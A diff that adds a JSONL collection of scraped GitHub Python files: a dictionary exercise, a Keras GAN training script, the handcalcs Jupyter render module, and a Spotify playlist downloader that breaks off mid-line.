diff --git "a/4553.jsonl" "b/4553.jsonl" new file mode 100644--- /dev/null +++ "b/4553.jsonl" @@ -0,0 +1,768 @@ +{"seq_id":"39067630551","text":"# Dictionary\nx, y, z = {'car': 45, 1: 'new', 'carbon': 32}\n\n# homer = 'never'\n# x = {'never': 'ever'}\nprint(type(y))\nnew_type = str(y)\nprint(new_type)\nprint(type(new_type))\n\ndictionary_items = {\n 'a': [1, 5, 6],\n 'b': 2,\n 'c': 3\n}\nprint(dictionary_items['a'][1])\n\nnew_list = [\n {\n 'a': [1, 5, 6],\n 'b': 2,\n 'c': 3\n },\n {\n 'f': [6, 2, 0],\n 'k': 2,\n 'l': 3\n }\n]\nprint(new_list[1])\nprint(new_list[1]['f'])\nprint(new_list[1]['f'][0])\n\n# Use the get method in order to find values from keys in a dictionary so it doesn't break the rest of the code execution\nprint(new_list[0].get('a', 'The value doesnt exist'))\n\nuser = {\n 'basket': [1, 3, 4],\n 'greet': 'jello',\n 'age': 30\n}\n\nprint('basket' in user)\nprint('size' in user)\nprint(user.update({'age': 55}))\nprint(user)","repo_name":"HamzahHal/Advanced_Python","sub_path":"Dictionary.py","file_name":"Dictionary.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2384993745","text":"from keras.models import Sequential, Model\nfrom keras.layers import Input, Dense, Dropout, Activation, \\\n Flatten, LeakyReLU, BatchNormalization, Conv2DTranspose, Conv2D,MaxPooling2D, Reshape\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers.convolutional import UpSampling2D\nfrom keras.optimizers import Adam, RMSprop,SGD\nfrom keras.initializers import RandomNormal\nfrom keras.models import load_model\nimport numpy as np\nimport Divers\nimport matplotlib.pyplot as plt\nimport copy\nimport time\n\n\ndef generator_8x8(input_gen=20, leaky_alpha=0.2,dropRate=0.3,output_img=(8,8,3)):\n model = Sequential()\n\n model.add(Dense(32*2*2,input_dim=input_gen, name=\"Dens1_generator_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(32 * 2 * 2, name=\"Dens2_generator_8x8\"))\n model.add(Dropout(dropRate))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Reshape((2, 2, 32), input_shape=(32 * 2 * 2,)))\n\n model.add(Conv2DTranspose(64, kernel_size=(3,3), strides=(2,2),padding='same', name=\"ConvTransp1_generator_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(64, kernel_size=(3,3), padding='same', strides=(1,1), name=\"Conv1_generator_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n\n model.add(Conv2DTranspose(128, kernel_size=(3,3), strides=(2,2),padding='same', name=\"ConvTransp2_generator_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(128, kernel_size=(3,3), padding='same', strides=(1,1), name=\"Conv2_generator_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n \n model.add(Conv2D(3, kernel_size=(3,3), padding='same', activation='tanh', strides=(1,1), name=\"Conv3_generator_8x8\"))\n \n model.summary()\n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\ndef generator_16x16(input_gen=20, leaky_alpha=0.2,dropRate=0.3,output_img=(16,16,3)):\n model = Sequential()\n\n model.add(Conv2DTranspose(256, kernel_size=(3,3), strides=(2,2),padding='same', name=\"convTransp1_generator_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(256, kernel_size=(3,3), padding='same', strides=(1,1), name=\"conv1_generator_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(256, kernel_size=(3,3), padding='same', strides=(1,1), name=\"conv2_generator_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n \n model.add(Conv2D(3, kernel_size=(3,3), padding='same', activation='tanh', strides=(1,1), name=\"conv3_generator_16x16\"))\n \n #model.summary()\n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\ndef discriminator_16x16(leaky_alpha=0.2, dropRate=0.3, image_shape=(16,16,3), output_dim=(8,8,3)):\n model = Sequential()\n \n model.add(Conv2D(512, (3, 3),padding='same',input_shape=image_shape, strides=(1,1), name=\"conv1_discri_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(512, (3, 3), strides=(1,1),padding='same', name=\"conv2_discri_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(256, (3, 3), strides=(1,1),padding='same', name=\"conv3_discri_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Conv2D(256, (3, 3), strides=(1,1),padding='same', name=\"conv4_discri_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n\n #Pour coordonner les 2 models\n model.add(Conv2D(3, (3, 3), strides=(1,1),padding='same', name=\"conv5_discri_16x16\"))\n model.add(LeakyReLU(alpha=0.2))\n\n model.summary()\n sgd=SGD(lr=0.0002)\n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\ndef discriminator_8x8(leaky_alpha=0.2, dropRate=0.3, image_shape=(8,8,3)):\n model = Sequential()\n \n model.add(Conv2D(64, (3, 3),padding='same',input_shape=image_shape, strides=(1,1), name=\"conv1_discri_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(64, (3, 3), strides=(1,1),padding='same', name=\"conv2_discri_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n\n model.add(Conv2D(128, (3, 3), strides=(1,1),padding='same', name=\"conv3_discri_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(128, (3, 3), strides=(1,1),padding='same', name=\"conv4_discri_8x8\"))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Flatten())\n model.add(Dense(128, name=\"Dens1_discri_8x8\"))\n model.add(Dropout(dropRate))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(BatchNormalization(momentum=0.8))\n\n model.add(Dense(1, name=\"Dens2_discri_8x8\"))\n model.add(Activation('sigmoid'))\n model.summary()\n sgd=SGD(lr=0.0002)\n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\ndef DCGAN(input_gen,dataset):\n # generator\n #g_1 = generator_model(sample_size, 0.2)\n #On load le generator_1\n #g_1.load_weights('g.h5')\n #g_2 = generator_model_part1(sample_size, 0.2)\n #On ajoute la seconde partie\n #g = Sequential([g_1,g_2])\n\n #g.summary()\n g_8x8 = generator_8x8(input_gen,0.2)#generatorV1_model(input_gen, 0.2)\n g_8x8.load_weights('g.h5')\n g_16x16 = generator_16x16()\n g = Sequential([g_8x8, g_16x16])\n sgd=SGD()\n g.compile(optimizer=Adam(lr=0.0001, beta_1=0.5), loss='binary_crossentropy',metrics=['accuracy'])\n # discriminator\n d_8x8 = discriminator_8x8()\n d_8x8.load_weights('d.h5')\n d_16x16 = discriminator_16x16()\n #d.load_weights('d.h5')\n d_8x8.trainable = False\n d_16x16.trainable = False\n d = Sequential([d_16x16,d_8x8])\n sgd=SGD()\n d.compile(optimizer=Adam(lr=0.0001, beta_1=0.5), loss='binary_crossentropy',metrics=['accuracy'])\n # GAN\n gan = Sequential([g, d])\n gan.summary()\n sgd=SGD()\n gan.compile(optimizer=Adam(lr=0.0001, beta_1=0.5), loss='binary_crossentropy',metrics=['accuracy'])\n return gan, g, d\n\n\ndef generatorV1_model(input_gen=20, leaky_alpha=0.2,dropRate=0.3):\n model = Sequential()\n\n model.add(Dense(input_dim=input_gen, output_dim=2048))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(32 * 8 * 8))\n model.add(Dropout(dropRate))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Reshape((8, 8, 32), input_shape=(32 * 8 * 8,)))\n #model.add(UpSampling2D(size=(2, 2)))\n model.add(Conv2DTranspose(64, kernel_size=(3,3), strides=(2,2),padding='same'))\n #model.add(BatchNormalization(momentum=0.8))\n #model.add(Dropout(dropRate))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Conv2D(64, kernel_size=(3,3), padding='same', strides=(1,1)))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n #model.add(BatchNormalization(momentum=0.8))\n #model.add(UpSampling2D(size=(2, 2)))\n model.add(Conv2DTranspose(128, kernel_size=(3,3), strides=(2,2),padding='same'))\n #model.add(BatchNormalization(momentum=0.8))\n #model.add(Dropout(dropRate))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Conv2D(128, kernel_size=(3,3), padding='same', strides=(1,1)))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n #model.add(BatchNormalization(momentum=0.8))\n #model.add(UpSampling2D(size=(2, 2)))\n \n model.add(Conv2DTranspose(256, kernel_size=(4,4), strides=(2,2),padding='same'))\n #model.add(BatchNormalization(momentum=0.8))\n #model.add(Dropout(dropRate))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Conv2D(256, kernel_size=(3,3), padding='same', strides=(1,1)))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n #model.add(BatchNormalization(momentum=0.8))\n model.add(Conv2D(3, kernel_size=(4,4), padding='same', activation='tanh', strides=(1,1)))\n #model.add(LeakyReLU(alpha=0.2)) \n\n model.summary()\n model.compile(loss='mean_squared_error', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\n#def discriminatorV1_model(leaky_alpha=0.2, dropRate=0.3, image_shape=(64,64,3)):\n# model = Sequential()\n \n# # layer1 (None,64,64,3)>>(None,32,32,32)\n# model.add(Conv2D(16, kernel_size=3, strides=2, input_shape=image_shape, padding=\"same\"))\n# model.add(LeakyReLU(alpha=leaky_alpha))\n\ndef generator_model_part1(dropRate=0.3, leaky_alpha=0.2):\n model = Sequential()\n\n\n # (None,16,16,128)>>(None,32,32,256)\n model.add(Conv2D(64, kernel_size=(2,2), padding=\"same\",input_shape=(64,64,3)))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=leaky_alpha))\n model.add(Dropout(dropRate))\n\n model.add(Conv2D(64, kernel_size=(2,2), padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=leaky_alpha))\n model.add(Dropout(dropRate))\n\n #(None,32,32,256)>>(None,32,32,256)\n model.add(Conv2D(3, kernel_size=(2,2), padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Activation(\"sigmoid\")) \n \n model.summary()\n \n \n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\n\ndef generator_model(nbrParamEntree=10, dropRate=0.3, leaky_alpha=0.2):\n model = Sequential()\n \n model.add(Dense(64*64*3, input_shape=(nbrParamEntree,)))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=leaky_alpha))\n\n # (None,16*16*128)>>(None,16,16,128)\n model.add(Reshape((64, 64, 3)))\n\n \n # (None,16,16,128)>>(None,32,32,256)\n model.add(Conv2D(128, kernel_size=(2,2), padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=leaky_alpha))\n model.add(Dropout(dropRate))\n\n model.add(Conv2D(128, kernel_size=(2,2), padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=leaky_alpha))\n model.add(Dropout(dropRate))\n\n #(None,32,32,256)>>(None,32,32,256)\n model.add(Conv2D(3, kernel_size=(2,2), padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Activation(\"sigmoid\")) \n \n model.summary()\n \n \n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['accuracy'])\n return model\n\ndef discriminator_model(leaky_alpha=0.2, dropRate=0.3, image_shape=(32,32,3)):\n model = Sequential()\n \n # layer1 (None,64,64,3)>>(None,32,32,32)\n model.add(Conv2D(64, (3, 3),\n padding='same',\n input_shape=(64, 64, 3), strides=(1,1)))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n\n model.add(Conv2D(64, (3, 3), strides=(1,1),padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n\n model.add(Conv2D(128, (3, 3), strides=(1,1),padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n model.add(Conv2D(128, (3, 3), strides=(1,1),padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(256, (3, 3), strides=(1,1),padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n model.add(Conv2D(256, (3, 3), strides=(1,1),padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n #model.add(BatchNormalization(momentum=0.8))\n\n #model.add(Dropout(dropRate))\n model.add(Conv2D(512, (3, 3), strides=(1,1),padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n #model.add(Dropout(dropRate))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n #model.add(BatchNormalization(momentum=0.8))\n\n model.add(Flatten())\n model.add(Dense(256))\n model.add(Dropout(dropRate))\n model.add(LeakyReLU(alpha=0.2))\n \n #model.add(BatchNormalization(momentum=0.8))\n #model.add(Dropout(dropRate))\n\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n model.summary()\n sgd=SGD(lr=0.0002)\n model.compile(loss='binary_crossentropy', optimizer=Adam(lr=0.0001, beta_1=0.5), metrics=['binary_accuracy'])\n return model\n\ndef entrainement(epochs, nbrImageEntrainement, datasetImg, ChargeSauvegarde, epoch_start,pasEntrainement,input_gen,nbrColImgGen,nbrLigneColImgGen,epoch_report):\n #On crée le GAN\n (gan, g, d) = DCGAN(input_gen,datasetImg)\n\n if(ChargeSauvegarde == True):\n gan.load_weights('GAN.h5')\n g.load_weights('g.h5')\n d.load_weights('d.h5')\n\n #On doit entraîner un peu le discriminateur\n if(epoch_start == 0):\n d.trainable = True\n d.fit(datasetImg[0:nbrImageEntrainement],np.ones(nbrImageEntrainement),epochs=5)\n d.trainable = False\n\n\n #On se prépare un vecteur de bruit fixe pour pouvoir voir l'évolution de ce vecteur\n bruitFixe = np.random.rand(nbrColImgGen*nbrLigneColImgGen,input_gen)\n\n moyaccDiscriTrueImageArray = []\n moyAccGANArray = []\n moyaccDiscriFalseImageArray = []\n\n moyLossDiscriTrueImageArray = []\n moyLossGANArray = []\n moyLossDiscriFalseImageArray = []\n\n #On init la variable de stockage d'image\n imgGenereNonCalib = np.ndarray(shape=(nbrColImgGen*nbrLigneColImgGen, datasetImg.shape[1],datasetImg.shape[2],3),\n dtype=np.float32)\n\n genImage = []\n\n for e in range(epoch_start,epochs):\n\n moyaccDiscriTrueImage = 0.0\n moyaccDiscriFalseImage = 0.0\n moyAccGAN = 0.0\n\n moyLossDiscriTrueImage = 0.0\n moyLossDiscriFalseImage = 0.0\n moyLossGAN = 0.0\n\n #On init le start time\n start_time = time.clock()\n\n for a in range(0,nbrImageEntrainement,pasEntrainement):\n\n temps_restant = (float(nbrImageEntrainement - a) * (time.clock() - start_time) )\n temps_restant_formate = time.strftime('%H:%M:%S', time.gmtime(temps_restant))\n print(\"Epochs \" + str(e) + \"/\" + str(epochs) + \" image : \" + str(a) + \"/\" + str(nbrImageEntrainement) + \n \" temps restant = \" + temps_restant_formate, end=\"\\r\")\n\n #On démarre le chrono\n start_time = time.clock()\n\n bruit = np.random.rand(pasEntrainement,input_gen)\n #On génère l'image à partir du bruit\n genImage = g.predict(bruit)\n\n #On entraîne le discriminateur\n d.trainable = True\n discriTrueImage = d.fit(datasetImg[a:a+pasEntrainement], np.ones(pasEntrainement),verbose=0)\n discriFalseImage = d.fit(genImage, np.zeros(pasEntrainement),verbose=0)\n d.trainable = False\n #On entraîne le generateur\n ganHistoryImg = gan.fit(bruit, np.ones(pasEntrainement),verbose=0)\n \n moyaccDiscriTrueImage = moyaccDiscriTrueImage + (discriTrueImage.history['acc'][0])\n moyaccDiscriFalseImage = moyaccDiscriFalseImage + (discriFalseImage.history['acc'][0])\n moyAccGAN = moyAccGAN + (ganHistoryImg.history['acc'][0])\n \n \n #Pareil pour le loss\n moyLossDiscriTrueImage = moyLossDiscriTrueImage + (discriTrueImage.history['loss'][0])\n moyLossDiscriFalseImage = moyLossDiscriFalseImage + (discriFalseImage.history['loss'][0])\n moyLossGAN = moyLossGAN + (ganHistoryImg.history['loss'][0])\n \n \n if ( (a % epoch_report == 0) & (a != 0) ):\n\n epoch_temp = (a / nbrImageEntrainement) + e\n\n moyaccDiscriTrueImage = moyaccDiscriTrueImage / epoch_report\n moyAccGAN = moyAccGAN / epoch_report\n moyaccDiscriFalseImage = moyaccDiscriFalseImage / epoch_report\n moyLossDiscriTrueImage = moyLossDiscriTrueImage / epoch_report\n moyLossGAN = moyLossGAN / epoch_report\n moyLossDiscriFalseImage = moyLossDiscriFalseImage / epoch_report\n\n #On fait la moyenne de l'acc\n moyaccDiscriTrueImageArray.append([epoch_temp, moyaccDiscriTrueImage])\n moyAccGANArray.append([epoch_temp,moyAccGAN])\n moyaccDiscriFalseImageArray.append([epoch_temp, moyaccDiscriFalseImage])\n #Pareil pour le loss\n moyLossDiscriTrueImageArray.append([epoch_temp, moyLossDiscriTrueImage])\n moyLossGANArray.append([epoch_temp,moyLossGAN])\n moyLossDiscriFalseImageArray.append([epoch_temp, moyLossDiscriFalseImage])\n \n if( e >= 1):\n #Sauvegarde\n gan.save_weights('GAN.h5')\n g.save_weights('g.h5')\n d.save_weights('d.h5')\n\n #On enregistre les perfs du GAN acc\n Divers.SauvegardePerfGAN(epoch_temp,np.array(moyaccDiscriTrueImageArray),np.array(moyAccGANArray),np.array(moyaccDiscriFalseImageArray),\"AccGAN\")\n\n #On enregistre les perfs du GAN loss\n Divers.SauvegardePerfGAN(epoch_temp,np.array(moyLossDiscriTrueImageArray),np.array(moyLossGANArray),np.array(moyLossDiscriFalseImageArray),\"LossGAN\") \n\n\n bruit = np.random.rand((nbrColImgGen*nbrLigneColImgGen),input_gen)\n #On génère l'image à partir du bruit\n genImage = g.predict(bruit)\n imgGenereNonCalib = copy.copy(genImage)\n imgGenerePrAffichage = Divers.UndoCalibrationValeurPixelDataset(imgGenereNonCalib)\n\n #On enregistre l'image générée\n Divers.SauvegardeImageMatplot(nbrColImgGen,nbrLigneColImgGen,imgGenerePrAffichage,\"Resultat/ImageGenerees/epochs_\" + str(epoch_temp) + \".png\")\n #On enregistre les images générées avec le bruit fixe\n \n #On génère l'image à partir du bruit\n genImage = g.predict(bruitFixe)\n imgGenereNonCalib = copy.copy(genImage)\n imgGenerePrAffichage = Divers.UndoCalibrationValeurPixelDataset(imgGenereNonCalib)\n Divers.SauvegardeImageMatplot(nbrColImgGen,nbrLigneColImgGen,imgGenerePrAffichage,\"Resultat/ImageGenerees/bruitFixe/epochs_\" + str(epoch_temp) + \".png\")\n\n #Si le discriminateur se trompe plus de la moitié du temps on arrete\n if(moyLossDiscriTrueImage >= 0.5):\n print(\"FIN entrainement !\")\n return\n\ndef afficheMeilleurImageGAN(nombreImg,nbrColonne,nbrLigne,nomFichier,input_gen,pourcentage_reussite):\n\n bruit = np.random.rand(nombreImg+1,input_gen)\n\n #On init la variable de stockage d'image\n dataset = np.ndarray(shape=(nbrColonne*nbrLigne, 64,64,3),\n dtype=np.float32)\n\n #On crée le GAN\n (gan, g, d) = DCGAN(input_gen,dataset)\n\n gan.load_weights('GAN.h5')\n g.load_weights('g.h5')\n d.load_weights('d.h5')\n\n imgListe = g.predict(bruit)\n pourcentageReussite = gan.predict(bruit)\n\n i=0\n index = 0\n while(i < ((nbrColonne*nbrLigne)-2) | index < nombreImg):\n print(\"Images trouvés : \" + str(i) + \" / \" + str(nbrColonne*nbrLigne) + \" Image parcourue : \" + str(index) + \" / \" + str(nombreImg), end=\"\\r\")\n \n if pourcentageReussite[index] > pourcentage_reussite:\n if i < (nbrColonne*nbrLigne) :\n dataset[i] = imgListe[index]\n i+=1\n index+=1\n dataset = Divers.UndoCalibrationValeurPixelDataset(dataset)\n\n Divers.SauvegardeImageMatplot(nbrColonne,nbrLigne,dataset,\"Resultat/\"+nomFichier)\n\n\n\n","repo_name":"Dapawan/Test_GAN","sub_path":"GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":20302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"15594771365","text":"import sys\nfrom . import handcalcs as hand\nfrom . import sympy_kit as s_kit\n\ntry:\n from IPython.core.magic import (\n Magics,\n magics_class,\n cell_magic,\n register_cell_magic,\n register_line_magic,\n )\n from IPython import get_ipython\n from IPython.display import Latex, Markdown, display\n from IPython.utils.capture import capture_output\nexcept ImportError:\n pass\n\n\ntry:\n ip = get_ipython()\n cell_capture = capture_output(stdout=True, stderr=True, display=True)\nexcept AttributeError:\n raise ImportError(\n \"handcalcs.render is intended for a Jupyter environment.\"\n \" Use 'from handcalcs import handcalc' for the decorator interface.\"\n )\n\n\ndef parse_line_args(line: str) -> dict:\n \"\"\"\n Returns a dict that represents the validated arguments\n passed in as a line on the %%render or %%tex cell magics.\n \"\"\"\n valid_args = [\"params\", \"long\", \"short\", \"sympy\", \"symbolic\", \"_testing\"]\n # valid_args = [\"params\", \"long\", \"short\", \"sympy\", \"symbolic\", \"_testing\"]\n sympy_arg = [\"sympy\"]\n line_parts = line.split()\n parsed_args = {\"override\": \"\", \"precision\": None, \"sympy\": False, \"sci_not\": None}\n # parsed_args = {\n # \"override\": \"\",\n # \"precision\": \"\",\n # }\n precision = \"\"\n for arg in line_parts:\n if arg.lower() in sympy_arg:\n parsed_args[\"sympy\"] = True\n continue\n if arg.lower() == \"sci_not\":\n parsed_args[\"sci_not\"] = True\n for valid_arg in valid_args:\n if arg.lower() in valid_arg:\n parsed_args.update({\"override\": valid_arg})\n break\n try:\n precision = int(arg)\n except ValueError:\n pass\n if precision or precision == 0:\n parsed_args.update({\"precision\": precision})\n return parsed_args\n\n\n@register_line_magic\ndef decimal_separator(line):\n if len(line) == 1:\n hand.LatexRenderer.dec_sep = line\n\n\n@register_cell_magic\ndef render(line, cell):\n # Retrieve var dict from user namespace\n user_ns_prerun = ip.user_ns\n line_args = parse_line_args(line)\n\n if line_args[\"sympy\"]:\n cell = s_kit.convert_sympy_cell_to_py_cell(cell, user_ns_prerun)\n\n # Run the cell\n with cell_capture:\n exec_result = ip.run_cell(cell)\n\n if not exec_result.success:\n return None\n\n # Retrieve updated variables (after .run_cell(cell))\n user_ns_postrun = ip.user_ns\n\n # Do the handcalc conversion\n renderer = hand.LatexRenderer(cell, user_ns_postrun, line_args)\n latex_code = renderer.render()\n\n # Display, but not as an \"output\"\n display(Latex(latex_code))\n\n if line_args[\"override\"] == \"_testing\":\n return latex_code\n\n\n@register_cell_magic\ndef tex(line, cell):\n # Retrieve var dict from user namespace\n user_ns_prerun = ip.user_ns\n line_args = parse_line_args(line)\n\n if line_args[\"sympy\"]:\n cell = s_kit.convert_sympy_cell_to_py_cell(cell, user_ns_prerun)\n\n # Run the cell\n with cell_capture:\n exec_result = ip.run_cell(cell)\n\n if not exec_result.success:\n return None\n\n # Retrieve updated variables (after .run_cell(cell))\n user_ns_postrun = ip.user_ns\n\n # Do the handcalc conversion\n renderer = hand.LatexRenderer(cell, user_ns_postrun, line_args)\n latex_code = renderer.render()\n\n # Display, but not as an \"output\"\n print(latex_code)\n\n if line_args[\"override\"] == \"_testing\":\n return latex_code\n\n\ndef load_ipython_extension(ipython):\n \"\"\"This function is called when the extension is\n loaded. It accepts an IPython InteractiveShell\n instance. We can register the magic with the\n `register_magic_function` method of the shell\n instance.\"\"\"\n ipython.register_magic_function(render, \"cell\")\n\n\n# def unload_ipython_extension(ipython):\n# \"\"\"This function is called when the extension is\n# loaded. It accepts an IPython InteractiveShell\n# instance. We can register the magic with the\n# `register_magic_function` method of the shell\n# instance.\"\"\"\n# print(dir(ipython.magics_manager))\n# ipython.magics_manager.remove(render)\n","repo_name":"connorferster/handcalcs","sub_path":"handcalcs/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":5272,"dataset":"github-code","pt":"77"} +{"seq_id":"6056241189","text":"import shutil\nimport requests\nfrom googleapiclient.discovery import build\nfrom pytube import YouTube\nimport os\nimport base64\nimport webbrowser\n\ndef INITIALIZE_VARIABLES():\n #Spotify\n global client_id\n client_id = os.environ.get(\"CLIENT_ID\")\n\n global client_secret \n client_secret = os.environ.get(\"CLIENT_SECRET\")\n\n global base_64\n base_64 = Base64Encode(client_id, client_secret)\n\n #Youtube\n global api_key\n api_key = os.environ.get(\"API_KEY_YT\")\n global service_yt\n service_yt = build(\"youtube\", \"v3\", developerKey=api_key)\n\ndef Base64Encode(CLIENT_ID, CLIENT_SECRET):\n key = CLIENT_ID + \":\" + CLIENT_SECRET\n key_encoded_byte = base64.b64encode(key.encode(\"ascii\"))\n key_encoded = key_encoded_byte.decode(\"ascii\")\n return key_encoded\n\ndef Authorization():\n print(\"Connecting to Spotify...\")\n auth_query = \"https://accounts.spotify.com/api/token\"\n try:\n auth_res = requests.post(auth_query, data={\"grant_type\":\"client_credentials\"}, headers={\"Authorization\":\"Basic \" + base_64})\n access_token = auth_res.json()[\"access_token\"]\n print(\"Successfully Connected to Spotify\")\n return access_token\n except:\n print(\"Error Connecting to Spotify, Please Try Again Later\")\n print(\"----------The End----------\")\n quit()\n\ndef Get_Playlist_Songs(access_token):\n #playlist_link = \"https://open.spotify.com/playlist/63qp5ewWfM4aGrXWQ8rlrC?si=ab856c6055eb457a\"\n #playlist_link = \"https://open.spotify.com/playlist/1CFs9S4xEqd1zBY75rWNTN?si=19fd75c994174fb4\"\n #playlist_link = \"https://open.spotify.com/playlist/0yXlKEvlgpWJ5eNRth61El?si=a24bd19e75884bdf\"\n playlist_link = input()\n\n playlist_id = playlist_link[34:56]\n \n print(\"Getting Data from Playlist...\")\n\n offset = 0\n songs = {\"name\":\"\", \"num_of_songs\":0, \"song\":[], \"artists\":[]}\n try:\n while True:\n playlist_query = \"https://api.spotify.com/v1/playlists/{}?fields=name\".format(playlist_id)\n playlist_items_query = \"https://api.spotify.com/v1/playlists/{}/tracks?limit=100&offset={}\".format(playlist_id, offset * 100)\n\n playlist_res = requests.get(playlist_query, headers={\"Authorization\":\"Bearer \" + access_token})\n playlist_items_res = requests.get(playlist_items_query, headers={\"Authorization\":\"Bearer \"+ access_token})\n\n playlist_name = playlist_res.json()[\"name\"]\n\n res_json = playlist_items_res.json()\n num_of_songs = len(playlist_items_res.json()[\"items\"]) \n\n songs[\"name\"] = playlist_name\n songs[\"num_of_songs\"] = num_of_songs \n for i in range(num_of_songs):\n x = 0\n artists = []\n while True:\n try:\n artists.append(res_json[\"items\"][i][\"track\"][\"artists\"][x][\"name\"])\n x += 1\n except:\n break\n songs[\"artists\"].append(artists)\n songs[\"song\"].append(playlist_items_res.json()[\"items\"][i][\"track\"][\"name\"])\n if num_of_songs < 100:\n break\n else:\n offset += 1\n except:\n print(\"Error Connecting to Playlist\")\n print(\"----------The End----------\")\n quit()\n\n print(\"Playlist Data Successfully Obtained\")\n return songs\n\ndef Display_Playlist(playlist):\n for i in range(playlist[\"num_of_songs\"]):\n print(\"{:>4}.\".format(i+1), playlist[\"song\"][i], \"-\", playlist[\"artists\"][i])\n\ndef Youtube(playlist_data):\n playlist_name = playlist_data[\"name\"]\n path = os.path.expanduser(\"~\\\\Music\\\\\" + playlist_name) \n\n print(\"Creating Playlist Folder for '\" + playlist_name + \"'\")\n\n if (os.path.isdir(path)):\n shutil.rmtree(path)\n \"\"\" print(\"Playlist already exists\")\n print(\"----------The End----------\")\n quit() \"\"\"\n else:\n os.mkdir(path)\n \n num_of_songs = playlist_data[\"num_of_songs\"]\n \n for i in range(num_of_songs):\n song_name = playlist_data[\"song\"][i]\n song_artists = playlist_data[\"artists\"][i]\n yt_req = service_yt.search().list(part=\"snippet\", q=\"{} {} audio\".format(song_name, song_artists[0]), type=\"video\", maxResults=1)\n res = yt_req.execute()\n vid_id = res[\"items\"][0][\"id\"][\"videoId\"]\n yt = YouTube(\"http://youtube.com/watch?v=\" + vid_id)\n video = yt.streams.filter(only_audio=True).first()\n try: \n dl_file = video.download(output_path=path)\n print(dl_file)\n os.rename(dl_file, path + \"\\\\\" + song_name + 